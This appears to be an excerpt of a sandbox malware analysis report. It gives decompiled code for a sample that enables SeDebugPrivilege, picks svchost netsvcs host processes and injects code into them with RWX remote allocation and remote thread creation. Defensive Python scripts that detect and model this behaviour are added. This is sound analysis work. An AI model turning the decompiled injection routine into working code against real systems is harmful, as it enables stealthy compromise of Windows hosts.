                                                            													E046481B0(_v36, _v52, 0xb,  &_v40, _t128, 0x1fffff);
                                                            													_t93 = _v40;
                                                            													_t146 = _t146 + 0x64;
                                                            													_v52 = _t93;
                                                            													if(_t93 != 0) {
                                                            														goto L14;
                                                            													}
                                                            												}
                                                            											} else {
                                                            												asm("cdq");
                                                            												_push(_t128);
                                                            												_push( &_v28);
                                                            												asm("cdq");
                                                            												_push(_t128);
                                                            												_push( &_v48);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(_v44);
                                                            												_push(_t136);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												_push(0);
                                                            												asm("cdq");
                                                            												E046481B0(_v40, _v52, 0xa, _t139, _t128, 0);
                                                            												_t93 = _v48;
                                                            												_t146 = _t147 + 0x5c;
                                                            												_v52 = _t93;
                                                            												if(_t93 != 0) {
                                                            													L14:
                                                            													WaitForSingleObject(_t93, 0xffffffff);
                                                            													FindCloseChangeNotification(_v52); // executed
                                                            													_v32 = 1;
                                                            												} else {
                                                            													goto L12;
                                                            												}
                                                            											}
                                                            										}
                                                            										_push(_t118);
                                                            										E04648D90(_t139, _t104, _t136, _v44);
                                                            										_t144 = _t146 + 0xc;
                                                            									}
                                                            								}
                                                            							}
                                                            							CloseHandle(_t139);
                                                            							return E04655AFE(_v8 ^ _t144);
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            0x04649006
                                                            0x04649009
                                                            0x04649010
                                                            0x04649014
                                                            0x04649015
                                                            0x04649018
                                                             Instruction address column for the decompiled function E04649000 (entries 0x04649019 through 0x0464938c, one per C-code line; 0x00000000 entries omitted)

                                                            APIs
                                                            • LoadLibraryA.KERNEL32 ref: 04649033
                                                            • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 0464903B
                                                            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 04649054
                                                            • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 04649066
                                                              • Part of subcall function 04645960: LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,0464C36B), ref: 04645970
                                                              • Part of subcall function 04645960: GetProcAddress.KERNEL32(00000000), ref: 04645977
                                                              • Part of subcall function 04645960: GetNativeSystemInfo.KERNEL32(?), ref: 04645997
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04649095
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649098
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046491FF
                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 0464920E
                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,0464BFF5,00003000,00000040), ref: 0464925B
                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,0464BFF5,?), ref: 0464927B
                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046492A3
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,RtlCreateUserThread), ref: 046492C1
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046492C8
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,NtCreateThreadEx), ref: 0464930B
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649312
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04649348
                                                            • VirtualFreeEx.KERNEL32(00000000,00000000,0464BFF5,00004000), ref: 0464936A
                                                            • CloseHandle.KERNEL32(00000000), ref: 04649371
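The API list above is the whole injection primitive of E04649000 in one place, but the constants are raw (0000043A, 00000014, 00000040, 00003000). As an added example that is not code from the report or from the sample, the following Python triage script parses an "APIs" block in exactly the format Joe Sandbox prints it, decodes those constants, and flags the remote-thread injection chain (privilege adjustment, OpenProcess with thread and VM-write rights, RWX VirtualAllocEx, WriteProcessMemory, a thread-creation primitive called directly or merely resolved by name). The sample input is the list above copied verbatim; the rule, its thresholds and the summary field names are the example's own choices.

```python
"""Triage helper for a Joe Sandbox 'APIs' listing (added example; not code from the report).

Parses lines such as
    WriteProcessMemory.KERNEL32(00000000,00000000,?,0464BFF5,?), ref: 0464927B
decodes the constant arguments and flags the remote-thread injection chain seen in
E04649000. SAMPLE_API_LISTING is copied from the report; the rule is this example's own.
"""
import re
from dataclasses import dataclass

SAMPLE_API_LISTING = """
• LoadLibraryA.KERNEL32 ref: 04649033
• GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 0464903B
• RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 04649054
• OpenProcess.KERNEL32(0000043A,00000000,?), ref: 04649066
  • Part of subcall function 04645960: LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,0464C36B), ref: 04645970
  • Part of subcall function 04645960: GetProcAddress.KERNEL32(00000000), ref: 04645977
  • Part of subcall function 04645960: GetNativeSystemInfo.KERNEL32(?), ref: 04645997
• LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04649095
• GetProcAddress.KERNEL32(00000000), ref: 04649098
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 046491FF
• FindCloseChangeNotification.KERNEL32(?), ref: 0464920E
• VirtualAllocEx.KERNEL32(00000000,00000000,0464BFF5,00003000,00000040), ref: 0464925B
• WriteProcessMemory.KERNEL32(00000000,00000000,?,0464BFF5,?), ref: 0464927B
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 046492A3
• LoadLibraryA.KERNEL32(ntdll.dll,RtlCreateUserThread), ref: 046492C1
• GetProcAddress.KERNEL32(00000000), ref: 046492C8
• LoadLibraryA.KERNEL32(ntdll.dll,NtCreateThreadEx), ref: 0464930B
• GetProcAddress.KERNEL32(00000000), ref: 04649312
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 04649348
• VirtualFreeEx.KERNEL32(00000000,00000000,0464BFF5,00004000), ref: 0464936A
• CloseHandle.KERNEL32(00000000), ref: 04649371
"""

# Windows constants (winnt.h); only the bits this listing exercises.
PROCESS_RIGHTS = {0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION"}
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_EXECUTE_READWRITE = 0x40
PRIVILEGE_LUIDS = {19: "SeShutdownPrivilege", 20: "SeDebugPrivilege"}   # LUID values
THREAD_PRIMITIVES = ("CreateRemoteThread", "RtlCreateUserThread", "NtCreateThreadEx", "QueueUserAPC")
NEEDED_RIGHTS = {"PROCESS_CREATE_THREAD", "PROCESS_VM_OPERATION", "PROCESS_VM_WRITE"}
LINE_RE = re.compile(r"^(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
                     r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list         # int for 8-hex-digit values, None for '?', str for names/strings
    ref: int
    subcall: str = ""  # address of the subcall the line was attributed to, if any


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def parse_api_lines(text: str) -> list:
    """Parse every non-empty line of a Joe Sandbox 'APIs' block into ApiCall records."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = [] if m["args"] is None else [_parse_arg(a) for a in m["args"].split(",")]
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["subcall"] or ""))
    return calls


def decode_flags(value: int, table: dict) -> list:
    """Names of the bits from `table` that are set in `value`, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def _arg(calls: list, api: str, index: int):
    """Argument `index` of the first call to `api`; None if absent or shown as '?'."""
    call = next((c for c in calls if c.api == api), None)
    return call.args[index] if call and index < len(call.args) else None


def injection_chain(calls: list) -> dict:
    """Summarise the injection-relevant calls and decide whether the chain is complete."""
    priv, access = _arg(calls, "RtlAdjustPrivilege", 0), _arg(calls, "OpenProcess", 0)
    alloc_type, protect = _arg(calls, "VirtualAllocEx", 3), _arg(calls, "VirtualAllocEx", 4)
    rights = decode_flags(access, PROCESS_RIGHTS) if isinstance(access, int) else []
    direct = sorted({c.api for c in calls if c.api in THREAD_PRIMITIVES})
    # Fallback primitives that are only resolved by name, via LoadLibraryA/GetProcAddress strings.
    resolved = sorted({a for c in calls if c.api in ("LoadLibraryA", "GetProcAddress")
                       for a in c.args if isinstance(a, str) and a in THREAD_PRIMITIVES})
    rwx, wrote = protect == PAGE_EXECUTE_READWRITE, any(c.api == "WriteProcessMemory" for c in calls)
    return {
        "privilege": PRIVILEGE_LUIDS.get(priv, f"LUID {priv}") if isinstance(priv, int) else None,
        "open_process_rights": rights,
        "alloc_type": decode_flags(alloc_type, ALLOC_TYPES) if isinstance(alloc_type, int) else [],
        "rwx_alloc": rwx, "write_memory": wrote,
        "thread_primitives": direct, "resolved_dynamically": resolved,
        "verdict": rwx and wrote and bool(direct or resolved) and NEEDED_RIGHTS <= set(rights),
    }
```

`injection_chain(parse_api_lines(SAMPLE_API_LISTING))` reports SeDebugPrivilege, the five rights in 0x43A, MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE, CreateRemoteThread as the primitive actually called, and RtlCreateUserThread plus NtCreateThreadEx as fallbacks that are only resolved, which is exactly what the listing shows: the thread-creation strings appear as GetProcAddress arguments, not as calls. The verdict requires the whole chain, so a listing that only closes handles or only allocates memory stays below the bar.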
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc$CloseObjectProcessSingleVirtualWait$AdjustAllocChangeCreateFindFreeHandleInfoMemoryNativeNotificationOpenPrivilegeRemoteSystemThreadWrite
                                                            • String ID: IsWow64Process$NtCreateThreadEx$RtlAdjustPrivilege$RtlCreateUserThread$kernel32.dll$ntdll.dll
                                                            • API String ID: 2461120785-1625205875
                                                            • Opcode ID: 637d4209b84fe85680d6f0bc709baff96a0949095ebd44b298d43a65d291c887
                                                            • Instruction ID: feb3bb408aac2ed64c8e3475daaaff3933090628a70bd7787950a7412da9c7d4
                                                            • Opcode Fuzzy Hash: 637d4209b84fe85680d6f0bc709baff96a0949095ebd44b298d43a65d291c887
                                                            • Instruction Fuzzy Hash: C591B0B1284301AFEB14EF658C49F6B7AE9EFD5B14F00051CF654D6280FB74E9098BA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                             C-Code - Quality: 61%
                                                             			// E0464BD60: enumerates running Win32 services (EnumServicesStatusExW), reads each one's
                                                             			// configured binary path (OpenServiceW + QueryServiceConfigW), keeps the host PID of every
                                                             			// service whose path contains "-k netsvcs" (an svchost.exe netsvcs group instance) in a
                                                             			// 100-entry stack table, then calls E04649000 (the injection routine whose API list is shown
                                                             			// above) once per unique PID, counting its non-zero returns in _v436.
                                                             			E0464BD60(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v408;
                                                            				struct _QUERY_SERVICE_CONFIG* _v412;
                                                            				char _v416;
                                                            				short* _v420;
                                                            				char _v424;
                                                            				intOrPtr _v428;
                                                            				void* _v432;
                                                            				short* _v436;
                                                            				int _v440;
                                                            				intOrPtr _v444;
                                                            				intOrPtr _v448;
                                                            				signed int _t58;
                                                            				void* _t63;
                                                            				char _t68;
                                                            				void* _t69;
                                                            				void* _t71;
                                                            				intOrPtr _t72;
                                                            				void* _t79;
                                                            				void* _t80;
                                                            				WCHAR* _t85;
                                                            				signed int _t87;
                                                            				void* _t101;
                                                            				long _t102;
                                                            				void* _t103;
                                                            				void* _t108;
                                                            				intOrPtr _t112;
                                                            				intOrPtr _t123;
                                                            				void* _t124;
                                                            				void* _t126;
                                                            				void* _t128;
                                                            				intOrPtr* _t132;
                                                            				signed int _t134;
                                                            				intOrPtr* _t137;
                                                            				signed int _t142;
                                                            				void* _t143;
                                                            				void* _t144;
                                                            
                                                            				_t124 = __edi;
                                                            				_t58 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t58 ^ _t142;
                                                            				_v448 = __edx;
                                                            				_v436 = 0;
                                                            				_v424 = 0;
                                                            				_v416 = 0;
                                                            				_v420 = 0;
                                                            				_v444 = __ecx;
                                                            				E0465DEA0(__edi,  &_v408, 0, 0x190);
                                                            				_t144 = _t143 + 0xc;
                                                             				_t63 = OpenSCManagerW(0, 0, 0xf003f); // executed; 0xf003f = SC_MANAGER_ALL_ACCESS
                                                            				_t101 = _t63;
                                                            				_v412 = _t101;
                                                            				if(_t101 != 0) {
                                                            					_t132 = __imp__EnumServicesStatusExW;
                                                             					 *_t132(_t101, 0, 0x30, 1, 0, 0,  &_v424,  &_v416,  &_v420, 0, __esi); // EnumServicesStatusExW(hSCM, SC_ENUM_PROCESS_INFO, SERVICE_WIN32, SERVICE_ACTIVE, NULL, 0, ...): size query for running services
                                                            					_t68 = _v424;
                                                            					if(_t68 != 0) {
                                                            						_push(_t124);
                                                            						_t102 = _t68 + 0x2c;
                                                            						_t69 = LocalAlloc(0x40, _t102); // executed
                                                            						_v432 = _t69;
                                                            						if(_t69 != 0) {
                                                            							_push(0);
                                                            							_v420 = 0;
                                                            							_push( &_v420);
                                                            							_push( &_v416);
                                                            							_push( &_v424);
                                                            							_push(_t102);
                                                            							_t103 = _v412;
                                                            							_push(_t69);
                                                            							_push(1);
                                                            							_push(0x30);
                                                            							_push(0);
                                                            							_push(_t103);
                                                            							if( *_t132() != 0) {
                                                            								_t71 = LocalAlloc(0x40, 0x2000); // executed
                                                            								_t126 = CloseServiceHandle;
                                                            								_t108 = _t71;
                                                            								_t72 = 0;
                                                            								_v412 = _t108;
                                                            								_v440 = 0;
                                                            								_v428 = 0;
                                                            								if(_v416 > 0) {
                                                             									_t137 = _v432 + 0x24; // -> dwProcessId of the first ENUM_SERVICE_STATUS_PROCESSW record (record stride 0x2c)
                                                             									asm("o16 nop [eax+eax]");
                                                             									do {
                                                             										if( *((intOrPtr*)(_t137 - 0x18)) == 4) { // dwCurrentState == SERVICE_RUNNING
                                                             											_t80 = OpenServiceW(_t103,  *(_t137 - 0x24), 1); // executed; lpServiceName, SERVICE_QUERY_CONFIG
                                                            											_t128 = _t80;
                                                            											if(_t128 == 0) {
                                                            												_t126 = CloseServiceHandle;
                                                            											} else {
                                                            												if(QueryServiceConfigW(_t128, _v412, 0x2000,  &_v440) == 0) {
                                                            													L21:
                                                            													_t126 = CloseServiceHandle;
                                                            													CloseServiceHandle(_t128);
                                                            												} else {
                                                             													_t85 =  *(_v412 + 0xc); // QUERY_SERVICE_CONFIGW.lpBinaryPathName
                                                             													if(_t85 != 0 && StrStrIW(_t85, L"-k netsvcs") != 0) { // case-insensitive: svchost.exe hosting the netsvcs group
                                                            														_t123 =  *_t137;
                                                            														_t87 = 0;
                                                            														asm("o16 nop [eax+eax]");
                                                            														while(1) {
                                                            															_t112 =  *((intOrPtr*)(_t142 + _t87 * 4 - 0x194));
                                                            															if(_t112 == _t123) {
                                                            																goto L21;
                                                            															}
                                                            															if(_t112 == 0) {
                                                            																 *((intOrPtr*)(_t142 + _t87 * 4 - 0x194)) = _t123;
                                                            																goto L21;
                                                            															} else {
                                                            																_t87 = _t87 + 1;
                                                            																if(_t87 < 0x64) {
                                                            																	continue;
                                                            																} else {
                                                            																	_t126 = CloseServiceHandle;
                                                            																	CloseServiceHandle(_t128);
                                                            																}
                                                            															}
                                                            															goto L23;
                                                            														}
                                                            													}
                                                            													goto L21;
                                                            												}
                                                            											}
                                                            											L23:
                                                            											_t72 = _v428;
                                                            										}
                                                            										_t72 = _t72 + 1;
                                                            										_t137 = _t137 + 0x2c;
                                                            										_v428 = _t72;
                                                            									} while (_t72 < _v416);
                                                            									_t108 = _v412;
                                                            								}
                                                            								LocalFree(_t108);
                                                            								LocalFree(_v432);
                                                            								CloseServiceHandle(_t103);
                                                            								_t134 = 0;
                                                            								while(1) {
                                                            									_t109 =  *((intOrPtr*)(_t142 + _t134 * 4 - 0x194));
                                                            									if( *((intOrPtr*)(_t142 + _t134 * 4 - 0x194)) == 0) {
                                                            										break;
                                                            									}
                                                            									_t122 = _v444;
                                                            									if(_v444 != 0) {
                                                            										_t78 = _v448;
                                                            										if(_v448 != 0) {
                                                             											_t79 = E04649000(_t103, _t109, _t122, _t126, _t134, _t78); // executed; _t109 = svchost PID from the table, E04649000 = injection routine (API list above)
                                                            											_t144 = _t144 + 4;
                                                            											if(_t79 != 0) {
                                                            												_v436 = _v436 + 1;
                                                            											}
                                                            										}
                                                            									}
                                                            									_t134 = _t134 + 1;
                                                            									if(_t134 < 0x64) {
                                                            										continue;
                                                            									}
                                                            									break;
                                                            								}
                                                            								return E04655AFE(_v8 ^ _t142);
                                                            							} else {
                                                            								CloseServiceHandle(_t103);
                                                            								LocalFree(_v432);
                                                            								return E04655AFE(_v8 ^ _t142);
                                                            							}
                                                            						} else {
                                                            							CloseServiceHandle(_v412);
                                                            							return E04655AFE(_v8 ^ _t142);
                                                            						}
                                                            					} else {
                                                            						CloseServiceHandle(_t101);
                                                            						return E04655AFE(_v8 ^ _t142);
                                                            					}
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t142);
                                                            				}
                                                            			}
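The loop above is only readable once the pointer arithmetic is resolved: the decompiler keeps a pointer at record+0x24, reads the state at pointer-0x18 and the name pointer at pointer-0x24, and advances by 0x2c. The following Python model is added here to check that arithmetic against the x86 layout of ENUM_SERVICE_STATUS_PROCESSW and to reproduce the target selection, including the 0x64-slot deduplication table and its full-table edge case. It is not the sample's code and not part of the report. It assumes the 32-bit layout (the dump is 32-bit), a buffer base address of 0 so that string pointers equal buffer offsets, and a dictionary standing in for what OpenServiceW plus QueryServiceConfigW would return; the service names, PIDs and paths are constructed.

```python
"""Model of the target selection in E0464BD60 (added example; not the sample's own code).

Lays out ENUM_SERVICE_STATUS_PROCESSW records (x86 layout, stride 0x2c) in a constructed
buffer, verifies the offsets the decompiled loop uses (+0x24 = dwProcessId, -0x18 from it =
dwCurrentState, -0x24 from it = lpServiceName), and applies the same filter: running service,
binary path containing "-k netsvcs", unique PIDs collected into a 0x64-slot table.
Assumptions: base address 0 (pointers equal offsets); a dict stands in for
OpenServiceW + QueryServiceConfigW; all service names, PIDs and paths are made up.
"""
import struct

SERVICE_RUNNING = 4
SERVICE_WIN32 = 0x30                        # OWN_PROCESS | SHARE_PROCESS, as passed to EnumServicesStatusExW
RECORD_FMT = "<IIIIIIIIIII"                 # two 32-bit pointers, then SERVICE_STATUS_PROCESS (9 DWORDs)
RECORD_SIZE = struct.calcsize(RECORD_FMT)   # 0x2c: the stride in the decompiled loop
FIELDS = ("lpServiceName", "lpDisplayName", "dwServiceType", "dwCurrentState",
          "dwControlsAccepted", "dwWin32ExitCode", "dwServiceSpecificExitCode",
          "dwCheckPoint", "dwWaitHint", "dwProcessId", "dwServiceFlags")
MAX_TARGETS = 0x64                          # 100 DWORDs: the 0x190-byte stack table zeroed at entry

# Constructed data: (service name, dwCurrentState, host PID) and the lpBinaryPathName
# QueryServiceConfigW would return for each service.
SAMPLE_SERVICES = [
    ("Schedule", SERVICE_RUNNING, 1044),
    ("Themes", SERVICE_RUNNING, 1044),      # same netsvcs host as Schedule -> deduplicated
    ("BITS", SERVICE_RUNNING, 1360),        # a second netsvcs host
    ("Dnscache", SERVICE_RUNNING, 1320),    # different svchost group -> ignored
    ("wuauserv", 1, 0),                     # SERVICE_STOPPED -> ignored before any config lookup
    ("Spooler", SERVICE_RUNNING, 2208),     # own process, no "-k netsvcs" -> ignored
]
SAMPLE_CONFIG = {
    "Schedule": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "Themes": r"C:\Windows\System32\svchost.exe -k Netsvcs",
    "BITS": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "Dnscache": r"C:\Windows\system32\svchost.exe -k NetworkService",
    "wuauserv": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}


def field_offset(name: str) -> int:
    """Byte offset of a field inside the x86 ENUM_SERVICE_STATUS_PROCESSW record."""
    return FIELDS.index(name) * 4


def build_enum_buffer(services: list) -> bytes:
    """Records followed by their UTF-16LE names, as EnumServicesStatusExW fills the caller's
    buffer; lpServiceName holds the name's offset (buffer base taken as 0)."""
    records, names = bytearray(), bytearray()
    strings_base = RECORD_SIZE * len(services)
    for name, state, pid in services:
        name_off = strings_base + len(names)
        names += name.encode("utf-16-le") + b"\x00\x00"
        records += struct.pack(RECORD_FMT, name_off, 0, SERVICE_WIN32, state, 0, 0, 0, 0, 0, pid, 0)
    return bytes(records + names)


def read_wstr(buf: bytes, off: int) -> str:
    """NUL-terminated UTF-16LE string at `off` (stops at the buffer end if unterminated)."""
    end = off
    while end + 2 <= len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[off:end].decode("utf-16-le")


def select_targets(buf: bytes, count: int, service_config: dict) -> list:
    """The decompiled filter: pointer p starts at record+0x24 (dwProcessId); state is read at
    p-0x18 and the name pointer at p-0x24; PIDs go into a zero-initialised 0x64-slot table,
    skipped when already present and dropped when the table is full."""
    table = [0] * MAX_TARGETS
    p = field_offset("dwProcessId")
    for _ in range(count):
        (state,) = struct.unpack_from("<I", buf, p - 0x18)
        if state == SERVICE_RUNNING:
            (name_off,) = struct.unpack_from("<I", buf, p - 0x24)
            path = service_config.get(read_wstr(buf, name_off), "")  # OpenServiceW + QueryServiceConfigW
            if "-k netsvcs" in path.lower():                          # StrStrIW is case-insensitive
                (pid,) = struct.unpack_from("<I", buf, p)
                for i in range(MAX_TARGETS):
                    if table[i] == pid:
                        break
                    if table[i] == 0:
                        table[i] = pid
                        break
        p += RECORD_SIZE
    return [pid for pid in table if pid]


if __name__ == "__main__":
    print(select_targets(build_enum_buffer(SAMPLE_SERVICES), len(SAMPLE_SERVICES), SAMPLE_CONFIG))
```

With the constructed data the selection yields the two netsvcs host PIDs, 1044 once (two services share it) and 1360; Dnscache, the stopped service and the own-process service are skipped. Because the table is a fixed 100 slots and the original loop simply closes the service handle when no free slot is found, a host with more than 100 netsvcs processes would have its extra PIDs silently dropped, which the model reproduces.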

                                                             Instruction address column for E0464BD60:
                                                            0x0464bd60
                                                            0x0464bd69
                                                            0x0464bd70
                                                            0x0464bd75
                                                            0x0464bd82
                                                            0x0464bd88
                                                            0x0464bd8e
                                                            0x0464bd94
                                                            0x0464bda1
                                                            0x0464bda7
                                                            0x0464bdac
                                                            0x0464bdb8
                                                            0x0464bdbe
                                                            0x0464bdc0
                                                            0x0464bdc8
                                                            0x0464bdda
                                                            0x0464be02
                                                            0x0464be04
                                                            0x0464be0c
                                                            0x0464be27
                                                            0x0464be2e
                                                            0x0464be34
                                                            0x0464be36
                                                            0x0464be3e
                                                            0x0464be5f
                                                            0x0464be67
                                                            0x0464be71
                                                            0x0464be78
                                                            0x0464be7f
                                                            0x0464be80
                                                            0x0464be81
                                                            0x0464be87
                                                            0x0464be88
                                                            0x0464be8a
                                                            0x0464be8c
                                                            0x0464be8e
                                                            0x0464be93
                                                            0x0464bec3
                                                            0x0464bec5
                                                            0x0464becb
                                                            0x0464becd
                                                            0x0464becf
                                                            0x0464bed5
                                                            0x0464bedf
                                                            0x0464beeb
                                                            0x0464bef7
                                                            0x0464befa
                                                            0x0464bf00
                                                            0x0464bf04
                                                            0x0464bf10
                                                            0x0464bf16
                                                            0x0464bf1a
                                                            0x0464bf92
                                                            0x0464bf1c
                                                            0x0464bf37
                                                            0x0464bf87
                                                            0x0464bf88
                                                            0x0464bf8e
                                                            0x0464bf39
                                                            0x0464bf3f
                                                            0x0464bf44
                                                            0x0464bf56
                                                            0x0464bf58
                                                            0x0464bf5a
                                                            0x0464bf60
                                                            0x0464bf60
                                                            0x0464bf69
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bf6d
                                                            0x0464bf80
                                                            0x00000000
                                                            0x0464bf6f
                                                            0x0464bf6f
                                                            0x0464bf73
                                                            0x00000000
                                                            0x0464bf75
                                                            0x0464bf76
                                                            0x0464bf7c
                                                            0x0464bf7c
                                                            0x0464bf73
                                                            0x00000000
                                                            0x0464bf6d
                                                            0x0464bf60
                                                            0x00000000
                                                            0x0464bf44
                                                            0x0464bf37
                                                            0x0464bf98
                                                            0x0464bf98
                                                            0x0464bf98
                                                            0x0464bf9e
                                                            0x0464bf9f
                                                            0x0464bfa2
                                                            0x0464bfa8
                                                            0x0464bfb4
                                                            0x0464bfb4
                                                            0x0464bfc1
                                                            0x0464bfc9
                                                            0x0464bfcc
                                                            0x0464bfce
                                                            0x0464bfd0
                                                            0x0464bfd0
                                                            0x0464bfd9
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bfdb
                                                            0x0464bfe3
                                                            0x0464bfe5
                                                            0x0464bfed
                                                            0x0464bff0
                                                            0x0464bff5
                                                            0x0464bffa
                                                            0x0464bffc
                                                            0x0464bffc
                                                            0x0464bffa
                                                            0x0464bfed
                                                            0x0464c002
                                                            0x0464c006
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464c006
                                                            0x0464c01e
                                                            0x0464be95
                                                            0x0464be96
                                                            0x0464bea3
                                                            0x0464bebb
                                                            0x0464bebb
                                                            0x0464be40
                                                            0x0464be46
                                                            0x0464be5e
                                                            0x0464be5e
                                                            0x0464be0e
                                                            0x0464be0f
                                                            0x0464be26
                                                            0x0464be26
                                                            0x0464bdcb
                                                            0x0464bdd8
                                                            0x0464bdd8

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?), ref: 0464BDB8
                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,00000000,?,?,?,00000000,00000000,?,?,?), ref: 0464BE02
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?), ref: 0464BE0F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEnumHandleManagerOpenServiceServicesStatus
                                                            • String ID: -k netsvcs
                                                            • API String ID: 236840872-1604415765
                                                            • Opcode ID: 40e04cdff3de49c9f8bfdc2c8e4c053ae759d5780ae8e0d08a1f70577e1fd8ad
                                                            • Instruction ID: 60cf0da439774d0664b8df91f040a05307f25d757627b26d7bb99ec2dbf95d7f
                                                            • Opcode Fuzzy Hash: 40e04cdff3de49c9f8bfdc2c8e4c053ae759d5780ae8e0d08a1f70577e1fd8ad
                                                            • Instruction Fuzzy Hash: EA718071A012189FEF649F65DC84BEAB7B9EF99710F1100E9E90DE7241EB71AD408F50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 78%
                                                            			E04645CA0(void* __ebx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				int _v540;
                                                            				intOrPtr _v556;
                                                            				void* _v564;
                                                            				int _v568;
                                                            				signed int _t11;
                                                            				void* _t14;
                                                            				int _t16;
                                                            				long _t29;
                                                            				void* _t31;
                                                            				signed int _t32;
                                                            
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t32;
                                                            				_t29 = GetCurrentProcessId();
                                                            				_v568 = 0;
                                                            				_t14 = CreateToolhelp32Snapshot(2, 0); // executed
                                                            				_t31 = _t14;
                                                            				_v564 = 0x22c;
                                                            				_push( &_v564);
                                                            				_t16 = Process32FirstW(_t31); // executed
                                                            				if(_t16 != 0) {
                                                            					while(_v556 != _t29) {
                                                            						if(Process32NextW(_t31,  &_v564) != 0) {
                                                            							continue;
                                                            						} else {
                                                            						}
                                                            						L6:
                                                            						goto L7;
                                                            					}
                                                            					_v568 = _v540;
                                                            					goto L6;
                                                            				}
                                                            				L7:
                                                            				FindCloseChangeNotification(_t31); // executed
                                                            				return E04655AFE(_v8 ^ _t32);
			}

                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?,74CB4DC0), ref: 04645CB5
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04645CCB
                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 04645CE5
                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 04645D06
                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 04645D1C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
